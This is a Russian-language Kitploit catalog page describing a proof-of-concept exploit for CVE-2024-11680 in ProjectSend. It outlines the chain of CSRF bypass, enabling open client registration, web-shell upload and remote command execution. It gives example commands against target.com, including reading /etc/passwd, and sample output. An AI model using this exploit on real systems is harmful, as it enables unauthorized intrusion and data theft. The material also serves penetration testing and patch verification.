Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-11680 — Этот репозиторий содержит эксплойт proof-of-concept (PoC) для CVE-2024-11680 — критической уязвимости в ProjectSend r1605 и более ранних версиях. Эксплойт нацелен на некорректную аутентификацию, вызванную проблемами с неверными настройками привилегий, а также на внедрение команд. | Kitploit
Инструменты/GitHubGitHub/qucklecrabik/cve-2024-11680
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubqucklecrabik/cve-2024-11680

CVE-2024-11680

Этот репозиторий содержит эксплойт proof-of-concept (PoC) для CVE-2024-11680 — критической уязвимости в ProjectSend r1605 и более ранних версиях. Эксплойт нацелен на некорректную аутентификацию, вызванную проблемами с неверными настройками привилегий, а также на внедрение команд.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт ProjectSend CVE-2024-11680

Это PoC-эксплойт для CVE-2024-11680 — уязвимости неаутентифицированного изменения конфигурации и загрузки веб-шелла в ProjectSend.

Описание

Эксплойт использует несколько уязвимостей в ProjectSend:

  • Обход CSRF-токена, позволяющий изменять конфигурацию
  • Небезопасные настройки регистрации клиентов
  • Неограниченная загрузка файлов, приводящая к удалённому выполнению кода

Требования

  • Python 3.x
  • Необходимые Python-пакеты:
    root@kitploit:~
    pip install requests colorama
    

Использование

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Аргументы

  • -u, --url: целевой URL (например, )
http://target.com/projectsend
  • -c, --command: команда для выполнения на цели (по умолчанию: id)
  • Примеры

    root@kitploit:~
    # Get Python version
    python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
    
    # List directory contents
    python3 exploit.py -u http://target.com/projectsend -c "ls -la"
    
    # Get system information
    python3 exploit.py -u http://target.com/projectsend -c "uname -a"
    
    # Read passwd file
    python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
    

    Как это работает

    1. Разведка: получает CSRF-токен и проверяет уязвимость цели
    2. Изменение конфигурации: включает небезопасные параметры регистрации клиентов
    3. Регистрация пользователя: создаёт новую учётную запись клиента с автоматическим подтверждением
    4. Загрузка файла: загружает PHP-веб-шелл с расширением .phtml
    5. Выполнение команд: выполняет указанные команды через загруженный шелл

    Возможности

    • Автоматическое извлечение CSRF-токена
    • Генерация случайных учётных данных пользователя
    • Умное именование файлов и определение временных меток
    • Цветной вывод для лучшей наглядности
    • Встроенная возможность выполнения команд

    Правовое уведомление

    Этот инструмент предназначен только для образовательных целей. Используйте его ответственно и только на тех системах, на тестирование которых у вас есть явное разрешение.

    Ссылки

    • CVE-2024-11680

    Пример вывода

    root@kitploit:~
    [+] Target is vulnerable
    [+] Insecure options enabled
    [+] User registered successfully.
    [+] New username: NoDLQWYF
    [+] New password: X02A3g9LuN4S
    [+] File uploaded: kLoISqdA.phtml
    [+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
    [+] Command Output:
    Python 3.9.2
    
    Скачать инструмент